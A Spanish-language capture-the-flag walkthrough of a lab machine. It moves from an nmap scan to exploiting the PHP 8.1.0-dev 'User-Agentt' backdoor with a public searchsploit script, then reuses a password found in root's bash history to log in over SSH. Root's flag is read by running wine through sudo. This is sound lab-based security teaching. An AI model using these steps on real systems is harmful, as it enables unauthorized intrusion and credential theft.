Enumeramos puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.30❯ nmap -sCV -p 22,80,8080 -oN 02-targeted.txt 192.168.1.30
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-27 22:58 -04
Nmap scan report for 192.168.1.30
Host is up (0.00024s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
8080/tcp open http PHP cli server 5.5 or later (PHP 8.1.0-dev)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.98 secondsEl servidor del puerto 8080 corre PHP 8.1.0-dev, una build de desarrollo conocida por incluir una puerta trasera de RCE a través de la cabecera User-Agentt. Buscamos el exploit correspondiente y lo lanzamos:
❯ searchsploit 8.1.0-dev
Exploit Title | Path
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution | php/webapps/49933.py
❯ searchsploit -m 49933
❯ python3 49933.py
Enter the full host url:
http://192.168.1.30:8080/
Interactive shell is opened on http://192.168.1.30:8080/
Can't acces tty; job crontol turned off.
$Obtenemos una shell, pero estamos dentro de un contenedor. Revisando el historial de Bash de root del contenedor, encontramos unas credenciales reutilizables hacia el host real:
$ cat /root/.bash_history
sshpass -p 'L14mD0ck3Rp0w4' ssh liam@127.0.0.1Usamos esas credenciales para conectarnos por SSH al host como liam y obtenemos la primera flag:
❯ ssh liam@192.168.1.30
liam@192.168.1.30's password: L14mD0ck3Rp0w4
Linux zero 5.10.0-22-amd64 #1 SMP Debian 5.10.178-3 (2023-04-22) x86_64
Last login: Fri May 5 19:44:57 2023 from 192.168.1.10
liam@zero:~$Para escalar privilegios, revisamos los permisos sudo de liam:
liam@zero:~$ sudo -l
Matching Defaults entries for liam on zero:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User liam may run the following commands on zero:
(root) NOPASSWD: /usr/bin/winePodemos ejecutar wine como root. Aprovechamos que wine mapea el sistema de archivos Linux en la unidad Z: para leer la flag de root ejecutando cmd /c type sobre la ruta correspondiente:
liam@zero:~$ sudo wine cmd /c "type Z:\\root\\root.txt"
...
wine: configuration in L"/root/.wine" has been updated.
[redacted]
...Fin.